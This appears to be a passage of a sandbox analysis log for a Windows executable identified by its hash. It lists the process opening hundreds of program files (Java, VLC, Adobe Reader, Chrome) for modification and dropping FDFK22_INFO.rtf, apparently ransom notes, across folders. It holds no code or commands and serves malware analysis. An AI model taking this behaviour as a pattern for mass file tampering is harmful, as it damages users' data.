Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\topnav.gif a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.contenttype_3.4.200.v20140207-1251.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-masterfs.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-loaders_ja.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jre7\lib\management\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Thunder_Bay a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ql_2.0.100.v20131211-1531.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Kolkata a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ko\LC_MESSAGES\vlc.mo a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.attach_5.5.0.165303.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-13 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\bg\LC_MESSAGES\vlc.mo a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.model.workbench_1.1.0.v20140512-1820.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\META-INF\ECLIPSE_.RSA a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.help.nl_zh_4.4.0.v20140623020002.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\vi\LC_MESSAGES\vlc.mo a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\dailymotion.luac a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\keytool.exe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Tallinn a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\alt-rt.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Jayapura a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\core\locale\core_zh_CN.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Cayenne a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Indian\Maldives a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\license.html a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Bangkok a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\soundcloud.luac a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\info.gif a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Guam a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Optional\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\modules\dkjson.luac a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Setup Files\{AC76BA86-7AD7-1033-7B44-A90000000001}\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Yerevan a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Irkutsk a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\master_preferences a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\JoinFind.mpe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\mr\LC_MESSAGES\vlc.mo a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files (x86)\Google\Chrome\Application\Dictionaries\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\content-types.properties a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Tripoli a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Iqaluit a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Mozilla Firefox\defaults\pref\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\sq\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Panama a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Hobart a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.artifact.repository.nl_ja_4.4.0.v20140623020002.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateCore.exe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Resources\1033\msmdsrv.rll a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Rarotonga a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher_1.3.0.v20140415-2008.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-keyring_ja.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\larrow.gif a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\Tucuman a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\core\locale\com-sun-tools-visualvm-modules-startup_ja.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_ef8c08_256x240.png a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Javascripts\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\META-INF\ECLIPSE_.SF a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Sakhalin a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyclient.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui_5.5.0.165303.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Argentina\Ushuaia a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.di_1.0.0.v20140328-2112.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.touchpoint.natives_1.1.100.v20140523-0116.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-host-views_zh_CN.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-jvmstat.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.swt_0.11.101.v20140818-1343.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.alert_5.5.0.165303.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\ENU\VDK10.STC a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\ResumeUnlock.wma a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\bin\server\Xusage.txt a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\id\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Makassar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\intf\luac.luac a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-charts_ja.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Martinique a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateOnDemand.exe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\plugins\access\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Galapagos a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Whitehorse a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-editor-mimelookup-impl.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\security\java.policy a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Khandyga a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.help.webapp.nl_zh_4.4.0.v20140623020002.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\images\cursors\win32_CopyDrop32x32.gif a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.help.base.nl_zh_4.4.0.v20140623020002.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Indian\Maldives a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Mozilla Firefox\plugin-hang-ui.exe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.core_5.5.0.165303\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Sofia a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.frameworkadmin.nl_ja_4.4.0.v20140623020002.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\javadoc.exe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jps.exe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-editor-mimelookup-impl_ja.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Sakhalin a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\mobile.css a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-core-windows.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Pohnpei a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\sl.pak a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\A3DUtility.exe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\META-INF\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Istanbul a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-11 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT+4 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Kuching a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\META-INF\ECLIPSE_.SF a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\pt_BR\LC_MESSAGES\vlc.mo a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.p2.ui.overridden_5.5.0.165303.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\images\cursors\win32_CopyNoDrop32x32.gif a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.help_3.6.0.v20130326-1254.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\modules\simplexml.luac a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\DVA.api a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_ffd27a_256x240.png a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Abidjan a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.jdp_5.5.0.165303.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT+12 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Windows Journal\Templates\Genko_1.jtp a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\content-types.properties a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Oblique.otf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Araguaina a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-3 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\org-netbeans-core-windows_visualvm.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\unpack200.exe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\derby_common.bat a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jvisualvm.exe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\GMT a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jetty.continuation_8.1.14.v20131031.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\ImportUse.vdw a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.help.nl_ja_4.4.0.v20140623020002.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\feature.properties a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.batik.css_1.7.0.v201011041433.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ecf.provider.filetransfer_3.2.200.v20140827-1444.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.views_3.7.0.v20140408-0703.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\Macquarie a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\java-rmi.exe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\UTC a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.osgi.services.nl_zh_4.4.0.v20140623020002.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\wa\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\images\Other-48.png a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\UTC a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\th.pak a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-favorites_ja.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Monterrey a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler-ui_zh_CN.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\br\LC_MESSAGES\FDFK22_INFO.rtf 